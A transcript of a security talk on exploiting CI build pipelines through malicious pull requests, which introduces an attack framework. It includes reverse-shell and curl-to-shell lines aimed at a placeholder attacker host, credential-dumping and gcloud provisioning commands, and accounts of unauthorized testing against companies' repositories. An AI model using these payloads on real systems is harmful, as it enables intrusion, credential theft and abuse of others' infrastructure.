Welcome to Exploiting Continuous Integration and Automated Build Systems. I'll also be introducing a framework I wrote called CIDR. I'm Spacebox, also Tyler. I'm a security engineer at a software company called LeanKit. We're an agile and lean project management software company based out of Nashville. I do application and network security for them, both offensive and defensive, although this talk is in no way reflective of them as a company. I like to break into systems; I think, like many of us, that's how we got started. I also like building systems, both defensive and offensive and weaponized. I like learning, but I don't need to explain that to this group of people. I do security consulting and bug bounty stuff. I'm also part of the Nashville DC615 group when my children and schedule allow. We're going to go over a crash course of continuous integration and some of the high-level concepts, just to get everyone familiar and on board with these systems. Then I'll list some of the tools and talk a little bit about the tooling involved in these processes. We'll go over the build chain and some configuration problems that are inherent in these build systems. I'll give a real-world example of an exploit, just to get everyone familiar with what exploiting these might look like. Then I'll go over some bad practices I found during my research with the deployment systems at the end of these build chains. Then I'll do an example of another attack, and then I'll introduce CIDR. We need to start off with some definitions. Continuous integration, according to my definition, would be the systems and processes in place to allow and enable quick, iterative releases of code into production servers. Although it doesn't necessarily need to be production servers — it just needs to be a working environment of some kind. I'm sure this definition has some oversight I'm missing, but for the purposes of this talk, that's going to be the definition.
People use these systems to enable quick, iterative releases into environments — many times per day or week is often the end goal. So it's the deployment chain from development all the way to production. These systems tend to be repository-centric, which makes sense: you have developers who are developing code, and that code is the genesis for this entire process, so it makes sense that the repository is the centerpiece of this whole thing. The repositories are chained to the automated build systems, so they often kick off these processes. And so they're a point of exploitation, which we're going to be exploring. Another thing to note — not necessarily for my examples, but in general — is that these systems are being adapted to more than application or server-side code. The more we move toward cloud-based, automated infrastructure, the more these systems are and can be used for infrastructure components, allowing continuous integration of not only the application code but also the systems on which the application code lives. We have to talk about microservices. It's a buzzword — I probably needed to add the TM here for trademark — they're so hot right now. But they're basically abstraction at its finest. That's all it really is. It's not a new concept at all; it's the same old abstraction we've encountered in software development for decades. As it relates to application code, it's the concept of breaking down large applications into small applications that do one or two things really well. And this allows for autonomous development, in that you can give a development team the goal of saying: hey, we have this service, we need it to do these two things — take X input and provide Y output. And that team can develop the thing, and it can function on its own, irrespective of the other services.
It's built to handle failure and errors in a way that doesn't really impact other things — that's the theory. So there are some good security implications here, right? Frequent release cycles are fabulous. Faster code deployments equal quick remediation, in theory. I think it was Zane Lackey who said that fast iterations were their greatest security feature. I would second that, or at least say it's a really good security feature. Think about it: you have a CSRF vulnerability or something, you drop it on the developers to fix, and the developers fix it — the time from the point of fix to the time it's deployed is significantly reduced, which is really awesome, especially when you can reduce that to something like 20 minutes. And these systems enable no-outage deployments a lot of the time. They reduce single points of failure to some degree. Imagine you have a web application with a left-hand toolbar, and the left-hand toolbar is run by a single service. If that service goes down, the entire application is not rendered unusable — just that component of it. Likewise, compromise of a certain portion of these applications is not necessarily indicative of pwnage of the entire system as a whole. You might compromise something through some sort of server-side injection, run code, and somehow take control of the container in which the microservice runs, but that does not necessarily mean you have control over the entire application stack. It means you have control over that portion of the containerized application stack. But there are some inherently bad things too — human-error sorts of things. When you have systems that enable quick deployments, it maybe puts undue pressure on those who are fixing the code to push fixes up quickly when perhaps more review is needed.
I would also argue that the automated build systems — the CI systems and CI pipelines — are checked less for security than the code they're deploying. They sit in this middle sandwich layer: you have infrastructure components that are being tested, maybe through a network pen test; you have application code, which is being handled through an application pen test; and then you've got this quasi-containerized environment sitting on its own IP space, in its own containers, on top of the infrastructure but below the code — and it's really not being tested. And that's what we're going to be exploiting. We need to talk about tools. We'll start with the build systems, because they're the next step iteratively after the code repositories. The build systems basically listen, take code, and build it conditionally. Those conditions include the environment — so the system provisions an environment — and it also usually runs tests. You provide some sort of test script, and it runs that test script against the code base. If it succeeds, it gives you a thumbs-up, maybe back in GitHub. If it fails, it lets you know. Most of the vendors are quasi-containerized types of environments, right? You give it the code, it takes the code, spins up a Docker container or some sort of quasi-virtual environment, does the build, and then tears it all down. It's popular to have both cloud and on-prem based systems. For example, Travis, Drone, and CircleCI have cloud-based solutions where you basically give the service permission to look into your GitHub, and it takes the code and builds it out there. But a lot of these systems also have enterprise versions — in fact, some of them are exclusively enterprise — where you pull the build framework down behind your own firewall and do the builds there. So there are varying levels of threat depending on how these are hosted.
But that's just something to be aware of, and something we'll surely take advantage of. But there's more. The deployment systems would be the next iteration after this — though the deployment system very well might be one and the same as the build system, so I feel like I'm drawing a distinction here where there might not necessarily need to be one. Jenkins would be a very popular vendor here, but it also does the build portion as well, and some of the vendors on the other page do the build and also handle deployments. So I'm not saying these are cleanly split one way or the other, although some are just a build service and some are just a deployment service. Some vendors here would be Jenkins, Octopus Deploy, Kubernetes, Rancher, and Mesosphere. A lot of these are headed in a containerized direction as well. Once they take your code — maybe they even take an image — they deploy it to its respective infrastructure, like a cluster of servers they control. They spin up containers and basically use those hosts as a resource pool to provide containerized services. In a microservice architecture, this is where those services would go. So a basic chain of deployment might be: a developer pushes up to GitHub, and that push triggers a webhook event. Let's say your build service — I use Travis in this example — has already established a trust relationship with the repository. It sees that a pull request or a commit or some event has happened, and it knows to pull that code down and run its build. From there it might let GitHub know: hey, we've completed successfully, or we've failed. Some of these bundle an image up — they'll actually create an image of the code you just built — and ship it to a code or image repository like Docker Hub.
And then from there the deployment service would either take the code from the source, or take the image from the image repository, and deploy it out to its cluster of servers, where it's going to run microservices for whoever might be consuming them. These are not necessarily web-facing — they're just services, there to do whatever you want them to do. But when we look at these, especially when we start attacking the build servers — and that's where I'm going to focus — the configurations are the largest exposure, and there are some trends being adopted in the development world that maybe aren't the safest. In the software development life cycle, it's extremely common to build the code before merging it. In fact, it's being adopted to build the code before even reviewing the code, so that you don't waste your time reviewing it — right? Why would you want to waste your time reviewing code if you know it's not even going to build? So a lot of these systems are triggering off of pull requests and commits to GitHub repositories. The pull request is probably the largest threat vector here, because you are essentially allowing manipulation of a repo, and that repo holds downstream instructions for the build process. The configuration for most of these systems is held in the root of the repository, so you have scenarios where you can make a pull request to a repo you don't have permission over, and in doing so you're triggering a build — and not only that, the PR can actually contain changes to the build process itself, which allows for command injection and things like that. So that's what we're going to be exploiting. This is nothing vendor-specific. I'm not dropping any 0-days on any vendors or anything like that. This is vulnerability stacking.
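To make that concrete, here's a sketch of the kind of repo-root CI configuration being described — a hypothetical Travis-style file, not any particular vendor's real config. Every line of it lives in the repository, so every line is something a pull request can propose to change:

```yaml
# Hypothetical Travis-style config held at the root of the repo.
# Anyone who can open a PR can propose changes to any line below.
language: node_js
sudo: required            # asks the service for a root container
install:
  - npm install           # provisioning commands, run verbatim
script:
  - npm test              # the test script the build will execute
deploy:
  provider: script
  script: ./publish-image.sh   # downstream push to an image repo
```

This is why the PR is the threat vector: the build instructions travel with the code being built.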
To attack some of these, you might have three components misconfigured. In one example, you're taking advantage of the fact that, A, they're doing builds off of pull requests; B, they allow the `sudo: required` flag on the container, so now you can run your build commands as root; and maybe a third thing — that you can shove an image up to an image repository. Those three things stacked together allow you to poison an image repository for a company. Each of these services might be functioning perfectly, exactly as intended. It's the interaction between these services and the trust relationships that we're really going to be exploiting, because there's just a lot of oversight that can happen. These things are like Legos, and it's up to the automation engineers or sysadmins or whoever to figure out how to fit them together. When you provide a webhook, or a series of events being emitted, it's really up to the consumer of those events to know what to do with them, not the services providing them. So that's what we're going to take advantage of. I would say the most volatile attack surface is the scenario where you have a company with a public-facing repository that they want contributions to, for open source. We want an open source project, we want to give back to the world — but we also don't want to validate any of the code before we do builds, because, you know, that takes a lot of time, right? Well, the thing is, if they're hosting one of the internally based build services and pointing it at a public repository, they're basically opening it up so that you can run code on those internal build services — and they're allowing that to happen from public repositories, which is basically the world. Anyone can make a pull request. They don't have to accept the pull request; they don't have to commit it to a branch or anything like that.
You just cut a branch, make a PR, and run code on their servers. So specifically, when we're attacking the build services, there are three main ways, and the configuration files for these build services follow a very, very similar pattern — the differences are small. Some of them are a superset of something like a Docker Compose file, but most of them are some sort of YAML-based thing, and they follow some patterns. The ones I really take advantage of are the pre/post commands. These are raw Linux commands, most of the time, that you're allowed to run to provision the environment in which you're going to build and test. In many cases they actually allow you to specify a shell — so if you want to use bash instead of the default shell, or something else, it'll let you specify the shell on the image you want to run this code in. And not only that, but some of these systems say: if you need to run as root, just tell me. Just add a `sudo: required` field to the repo and we'll give you a root container instead, because that's easier. The second way — and I think this would be really fun to explore; I haven't explored it at all yet, but I think it would be really awesome — is that a lot of these specify an image in which to build, like a Docker image. Some of them allow you to blindly name an image on Docker Hub, and they'll pull that down and do your builds on it. Others will actually let you provide a Dockerfile, and they'll build the image you want to run on. So rather than worrying about injecting arbitrary commands on the Linux command line to compromise these machines, why don't you just pull down an already-poisoned image and run that? It's already weaponized — you don't have to do any work. And the third way would be the test builds. Some of these systems are getting wise to the fact that you can change the configuration files; most of them really haven't done much about it.
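Putting the three vectors side by side in one hypothetical config — the field names are illustrative, and `attacker/poisoned` and `attacker.example` are placeholders, not real artifacts:

```yaml
# Sketch: the same configuration knobs, turned malicious.
sudo: required                     # get a root container on request
image: attacker/poisoned:latest    # vector 2: build on an attacker-
                                   # controlled Docker Hub image
before_install:
  - curl -s http://attacker.example/payload.sh | sh   # vector 1: raw
                                                      # pre-build commands
script:
  - ./run_tests.sh                 # vector 3: the test script itself
                                   # can be swapped out in the same PR
```

Blocking config-file changes alone doesn't help, because vector 3 — the test script — is just another file in the repo.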
But the new version of Drone, I think, has the capability to say: hey, if the config file has changed, don't do a build. Well, that's fine — except most of these build files actually specify a test file to run. So who cares if I can't change the configuration file, right? I can just change the test script that runs and do all my malicious stuff through the tests. So I'll give you a real-world example. A colleague of mine came to me — I didn't have quite a full understanding of these systems yet. I knew what they did, I knew how they worked, but I hadn't really poked around at them. This is a Drone configuration — a real one. He came to me and said: I think if someone malicious had access to one of our repos, they could actually end up running code on the build server. He was worried about environment variables being changed — that seemed to be his concern. But as you can see here, the config specifies the image on which to build, some environment variables to provision, and some commands to run — and that's where it gets awesome. Then later you have the publish step to a Docker repository, and then some plugin information for alerting and such. So I thought: all right, let's do some command injection — just an echo statement, right? Just see if it says hello in the output of the build service. So I did, and it worked. And I couldn't believe it. But it was just an echo statement, and according to my reading, this is exactly how these systems were intended to function, so it didn't seem like that big of a deal to me. But I thought: if there's no limit to these commands — if they're not limiting the set of commands I'm able to run on these containers — I could do something like that, right, as one command. And then something like that as another command.
And then if I had some sort of listening server, right? So with something like this, I was actually able to exploit the same repo they were talking about and get root on the build container, which is awesome. But I didn't fully understand this. I had a whole lot of questions. Like: who is aware of this? Surely I'm not the only person to think this might be a concern. And as I was doing my reading on the continuous integration build server providers, most of them feel that this is the intended functionality. Yet there's a whole bunch of exposure to these build systems through public-facing repos. Even if they're cloud-based, I feel like there are implications here. But I wasn't fully aware of what the implications might be. What are all the different scenarios — public-facing versus private, cloud-based versus on-prem? What is the real exposure here? What's the real attack surface? How many people are actually doing builds on their servers through public-facing repositories, or just repositories in general? It turns out I was not the first to go down this avenue. Jonathan Claudius — I think he's now at Mozilla — came up with a tool three or four years ago called Rotten Apple. It was really cool, and I drew a lot from it. It's a framework for exploiting CI. I think he focused on Jenkins, through Ruby code builds. Now, I showed you three ways you might exploit through the configuration file; his focused on malicious test runs — the code tests, the third way. He had an audit framework for telling you how your Ruby Jenkins build might succeed or fail, and he also had an attack mode where you could do callbacks and, you know, dump SSH keys and things like that on potentially vulnerable servers.
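The actual commands from those slides aren't in the transcript, but the general shape of the escalation — from an echo statement to a root callback shell — would look something like this reconstructed Drone-style config. The host, port, and image are placeholders:

```yaml
# Reconstructed sketch of the command-injection PR (not the real config).
build:
  image: node:6
  commands:
    - echo "hello from the build container"            # proof of execution
    - whoami && id                                     # confirm root
    - bash -i >& /dev/tcp/attacker.example/4444 0>&1   # callback to a
                                                       # listening server
```

With a listener waiting on the other end, the moment the PR triggers a build, the container connects back and hands over an interactive root shell.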
There were a few other white papers out there on it, but given roughly three years of lead time, I was kind of surprised that more hackers hadn't hopped on this. But I thought: I'll poke around — seems interesting to me. Either I don't understand this well enough to do anything successful with it, or it's just something that isn't being looked at. So I started poking around at bug bounties and trying some of this on some repos — which, as it turns out, is out of scope for these tests. But that was a lesson learned later. I was doing a test against, I think, Square, and I did the same Drone-type attack, except against their Travis servers — the cloud-hosted Travis servers. And I let them know: hey, I got on your Travis server; I think I can mess up your build process. And they came back and said, basically: this is not a concern to us; it affects us in no way. And I'm thinking: I feel like it does. To their point, it wasn't running code on their own servers — but it was at least running code in their deployment chain, and it was queuing up builds in their build process. At this point I still wasn't quite sure of the full implications. So I started to try to figure out who cares about this. I care. But it seemed like this vendor in particular didn't. Some of the implications for cloud-based services: at the very least, if I'm building code through your cloud-based version of, say, Travis — yeah, I'm not doing anything on your infrastructure, but I am leveraging your repositories to do things on a server that's running code. I could clog up your build chain at the very least, because these things queue up, right? If I open like 600 pull requests, I'm going to open 600 queued builds that are just going to sit there until they go through. So, quasi denial of service, maybe. But this is free computing time. These are free computing resources.
So for example, Travis's computing resources, I think, max out at 50 minutes per build. They close a build after 10 minutes of no standard out, but I wrote some loops into my exploits to push that — to dump a standard-out line every minute so the build reaches its full 50 minutes of potential. Drone is like 60 minutes by default. But it's free computing power, so why hasn't anyone built a botnet and DoSed the crap out of something? I'm not encouraging this — I said "yes please," but that has a question mark. I'm really not condoning this, but think about it: open a whole bunch of pull requests against a whole bunch of exposed services that are all triggering builds through one service, and you're going to have this massive CI swarm on some target, right? I'm kind of surprised that it hasn't happened yet. Or you could — yeah, this was a joke. I don't know how you'd mine blockchain on a temporary build container, but you could. But for on-prem, this is where the real threat might exist. If you take over one of these build systems, even though it's in a container, you could take over a network, because these containers share IP space — even though they might be on their own mesh network of IPs, they still often have ports mapped to the host. There was an example in Jonathan's code where he was actually able to submit a pull request that would make a commit back to master, because the trust relationship between the build service and the repository wasn't scoped properly: even though you didn't have any permissions on the repository, the build service had SSH keys sufficient to talk back to the repository and commit to master. So you could actually change master code without even having permission to access the repo. That's plausible in theory on the cloud-based services too. But you could also have the ability to alter downstream deployment environments.
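The keep-alive trick described above — emitting a line of output periodically so the no-output watchdog never fires, letting the build run to its hard time cap — can be sketched like this. The interval and count are parameters; a real payload would use sixty-second beats for fifty minutes:

```shell
# Keep-alive: CI services kill builds after ~10 minutes of silence on
# stdout, but allow a longer hard cap (~50 min on Travis). One line per
# interval keeps the watchdog happy until the hard cap is reached.
keepalive() {
  interval=$1
  count=$2
  i=1
  while [ "$i" -le "$count" ]; do
    echo "still building... ($i)"   # heartbeat line on stdout
    sleep "$interval"
    i=$((i + 1))
  done
}

keepalive 1 3   # demo: three beats, one second apart
```

In an exploit config, this would run in the background alongside the actual long-running payload.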
Moving on from the build services down to the deployment services — or the hosted services, rather. There are some microservice practices being adopted that maybe aren't the healthiest. One is that environment variables are being used to store credentials for accessing other services — and this is, again, after you've done the build and deployed to production. This is one step better than having hard-coded credentials in a config file, but when you compromise one of these services, like I mentioned earlier — yeah, you haven't compromised the entire system, but dump some environment variables and you'll probably be able to pivot to some of the other systems. Additionally, only recently has the Docker namespace stuff improved to the point where it's not really, really hard — a pain — to run a container as something other than root. So what you find is that a lot of these services are running as root. Now you might be thinking: who cares, it's a container, right? A temporary container at that. Yeah, but like I said earlier, you have ports that are mapped to the host. So even if you're on some 192.168-style private IP mesh that the containers are sitting on, chances are if you scan a 10.0.0.0/8 network, you're going to be able to access stuff at the host level. This is true most of the time. And also: just because you have a reduced-footprint image, like an Alpine Linux image — which has a really small footprint, and that's really cool, and it has its place — if I compromise that image and I have internet access on it, it doesn't really matter that it has a reduced footprint. I can augment that image into whatever I want it to be. So I'll give you another example. I hadn't learned my lesson at this point, and I was still poking around.
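A minimal triage sketch along those lines — dump the environment of a compromised container and grep for credential-shaped variables. The `FAKE_DEPLOY_TOKEN` variable is planted here purely so the demo has something to find; the pattern list is illustrative, not exhaustive:

```shell
# Plant a fake credential so the demo is self-contained.
export FAKE_DEPLOY_TOKEN="not-a-real-secret"

# First stop after compromising a service: environment variables that
# look like credentials for pivoting to neighboring services.
env | grep -iE '(key|token|secret|passw)'
```

Anything this surfaces — API keys, database passwords, deploy tokens — is a candidate for pivoting to the other services in the mesh.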
In this case I was doing the same thing I did to the other vendor, but I was doing it to Facebook, and I was doing it through their Travis setup as well. I was just trying to explore and find things. But this is an example where I actually ended up compromising the CI vendor themselves. I was doing some basic reconnaissance work — just gathering basic information to see what was on the container. I do this sometimes just to see if I'm running on-prem or in the cloud; if I'm too lazy to go check the Travis setup, I can just run a command and look. But I noticed a strange set of environment variables — GC-prefixed ones that lent themselves to Google Cloud. So I started doing some research. I hadn't had much experience with Google Cloud; I had more experience with Azure and AWS. I figured out that these environment variables belonged to the gcloud CLI, which is a command-line utility for controlling infrastructure. If I'm a company using Google Cloud to host all my servers, these are the utilities to actually provision those environments. This should be something the user of the CI service has no part in using — no access to, even. It has no value to the user that I can see. This is something Travis would want control over in order to provision their service for everyone. In particular, I found this command set, and the first two were of the most interest to me, because they're what's used to provision resources and get project information. So I thought: all right, I'll give it a shot, right? I'll do a basic command here in my pull request, just to see if I can look at the project. And it worked. I couldn't believe it. I dumped project info for that current build, which included SSH keys and some other things about the service. So I was like: oh man, this is pretty cool. But this again is kind of read-only information. I don't know how big of a deal this is.
The real trial here, right, is going to be whether I can use this utility through a pull request to provision resources on their behalf. So I tried. And I couldn't believe it, but I ran `sudo gcloud compute networks create test-network --mode auto`. All this does is create a network called test-network. It ran, it didn't error out, and I was super happy. The second command down there lists the networks — I wanted to verify that this had indeed happened. And there it is: test-network. Not only that, but it provisioned these test networks in multiple regions. Yeah. So that was pretty exciting. I was really, really tempted to do this again and spin up servers. But I know that this IP-space stuff is usually virtual until it's used, and servers tend to charge money, so I didn't want to have to come to them and be like: hey, I did this thing, I found this vulnerability, and I spun up servers, and you're going to get a bill for it. But this was it. Really, this can be reduced to two lines. One is the `sudo: required`, which says: hey, I need a container that allows me to run as root. And then I just needed one more line. So with a two-line PR to a repository that I didn't have access to, I was able to deploy a geo-redundant network that spanned three continents. So now we'll talk about CIDR. And there are some video problems here — I was going to try to do a live demo for you, but thankfully I have a recorded demo, if it works. So we'll do that instead. I really wanted to show that to you, so maybe I'll show you afterwards in the hallway. CIDR is the Continuous Integration and Deployment exploiter. There are not a lot of words that start with CI, so I was really scraping for acronyms here. It's a framework for exploiting and attacking the CI build chain. Mine primarily leverages the GitHub attack surface to get access to the build services. So I'm really exploiting the build services here.
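Reassembled as the "two-line PR" the talk describes, the whole exploit fits in a hypothetical `.travis.yml` fragment like this — the `gcloud` commands come straight from the talk; the surrounding scaffolding is assumed:

```yaml
# The essence of the PR: a root container plus one gcloud call.
sudo: required
script:
  - sudo gcloud compute networks create test-network --mode auto
  - sudo gcloud compute networks list   # verify the network exists
```

Because the build container carried the vendor's own Google Cloud credentials in its environment, those commands ran with the vendor's authority — provisioning real infrastructure from an unprivileged pull request.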
Although there is so much more potential here — I'm hoping this catches on and people want to use it to exploit further downstream services like deployment services and image repositories, or to find other vendors or avenues of exploitation. But this is what mine does. It takes the mess out of forking and PRing and calling back. I have it handling callback shells, so you can basically exploit a whole bunch of targets, have your nice little sessions running, and then hop into the shells whenever you want to. And I have vendor-specific exploits that you just load and run. So it's kind of point-and-shoot: you give it a list of target repos, it figures out which ones the exploit is currently able to work against, and then it just runs them. I did it for fun. I also did it because I'm lazy — man, when you have to fork a target repository, pull that fork down, make the change, commit that back to your attacker repository, open a PR back against the target repository, have that build, and then have your little test fail... and then you have to do it all over again — it gets very repetitive and very, very old. So part of it was my own selfish laziness. But I also wanted to bring awareness. I feel like this isn't being looked at very much at all. And in fact, these systems oftentimes have things in place in their user agreements — for example, for the exploit I just showed you, I got banned from GitHub, because, as it turns out, it's against the user agreement to test against repos that you don't own. But I was really inspired by Jonathan Claudius's Rotten Apple project, and I wanted to expand upon that and facilitate further research. So I'm not going to go over all the commands, but here's basically the CLI — kind of a console platform for it. And I'll be posting the code after this talk. Basic help menus; add targets and list your targets.
You can load your repository or load your exploit, and you can list exploits as well — list them, find the ones you want, load them up. You can dump some basic information about them and hit run. It's written in Node, version 8. You'll also need a GitHub account and an ngrok account. These are free — create a free account and get your keys, because there's a feature inside where you can log in and provide your credentials. It stores them in an encrypted manner, so it can use those keys as part of the attack. It can handle bulk lists of repos. I'm going to add a feature to do some cleanup; right now it just leaves your commits and pull requests wide open. So it is a little messy at this point, from an attacker's perspective, if you're trying to be stealthy about this — which I'm not condoning, by the way. But I'm using ngrok because port forwarding sucks. Sometimes I'm just too lazy to open a port and have the callback shell talk to my machine. I'm also sometimes too lazy to hop on a pentest box and load it up with a public-facing endpoint. Ngrok works basically like this: it's a service, and it opens up a random subdomain on their endpoint, on a random port, and it provides you that. It tunnels that traffic back to your machine that's running ngrok — basically a proxy that tunnels out through the public web and forwards it on to your machine. So when I'm spinning up a shell, I open up a netcat instance and an ngrok endpoint, and the callback comes in — it's just so I can sit on a network I don't control and still get callbacks. Like I said earlier, it's against the GitHub user agreement to test against a repository even if you have permission from the owner of the repo. This means that you must be the owner of the repo to test the repo. So in testing, be sure to ask them to make you an owner. So, video demo time. Yes. So I am listing stuff here. I'm listing the exploits. So I listed targets.
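The ngrok plumbing just described can be sketched as a short session. This is a recipe, not a runnable demo — it requires an ngrok account, and the public hostname and port shown are placeholders that ngrok assigns at runtime:

```shell
# Expose a local listener through ngrok's TCP tunnel service.
ngrok tcp 4444 &        # ngrok prints something like:
                        #   tcp://0.tcp.ngrok.io:NNNNN -> localhost:4444
nc -lvnp 4444           # local netcat listener the tunnel forwards into

# The payload injected into the target's build config then calls back
# through the public ngrok endpoint, e.g.:
#   bash -i >& /dev/tcp/0.tcp.ngrok.io/NNNNN 0>&1
```

The effect is that the build container, anywhere on the internet, can reach your listener even though you're sitting behind NAT on a network you don't control.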
Now I'm listing the exploits. I'm going to load an exploit; in this case I'm loading the Travis netcat reverse shell. All it does is take every possible target, create a shell for it, poison the necessary repositories, and create a callback to the shells I have open. In this example the repos had already been forked; I had already cloned them locally, and it saw that as well. Of the four targets in the list, the exploit only applied to two, and it figured that out and only opened ports for those two. It started the ngrok service, grabbed the data from the ngrok service, shoved it into the poisoned Travis YAML file, pushed the commit up to my attacker repository, and requested a PR.

So now the PR has happened, and it's triggering a build. I have it doing a callback, so you'll see it say "the eagle has landed" when I get a callback from that shell. I'm probably going to take that feature out; I did it for demo purposes, but it does feel good when it pops up. So there it pops up: the eagle has landed. Now I drop into my sessions menu, after I celebrate a bit. The sessions menu is a new area with its own help menu, where I can list the currently available sessions and select one. The sessions are named by target repository and type; I'm attacking a group called space testerson, and I have a shell on that Travis server. Then I can back out of there. I hit back, which is the one command that doesn't pass through to the Linux shell, since there's no Linux command called back; it just hops out of the session menu. So that is CIDR in a nutshell. There are other exploits I've written for this, and I wrote it modularly to encourage contribution. But there are some limitations. Again, the build queues really stack up.
So if you're trying to get code on multiple repos to execute an attack or do something at exactly the same time, you're probably going to have variance in the timing, and it generates a lot of noise in GitHub. I don't know who's monitoring GitHub logs for malicious activity, but if anyone is, they're going to see it. The good thing is that if you get control of the build server, it doesn't matter if they ban you from GitHub; you already have access to their build server, so it doesn't really matter anymore. There are timeout issues. I've tried to maximize the timeouts, so for something like a shell you get about 50 minutes. You could have it spawn a new build process or something like that to persist access, but I haven't really gone down that route yet. And keep in mind this is leveraging the GitHub API, so their throttling applies, I think at 5,000 requests per hour. If you try to make more API requests than that against target repos, you're going to hit a wall.

Going forward, I would like to add more CI frameworks. Jenkins is a popular one that I just haven't explored yet, and I think it needs to be added. I'd like to start tackling more deployment services as well; I really haven't done much with downstream deployment services. I'd also like to start exploring other entry points. Right now I'm only using GitHub, but I could do GitLab or Bitbucket or something like that that might kick off builds. There's a new movement called ChatOps, which makes me kind of nauseous; it's basically kicking off production builds and deployments from Slack, and I feel like that's just ripe. Thanks to the LeanKit DevOps team, Evan for sending me down this rabbit hole, Jonathan for his work, and my wife for being cool with me staying up until 4 a.m. for the last month working on this software and this talk.
I can be found on GitHub, where I'll be posting this code in the next hour or so, and on Twitter at spacebox02x. My blog is Untamed Theory. Thank you.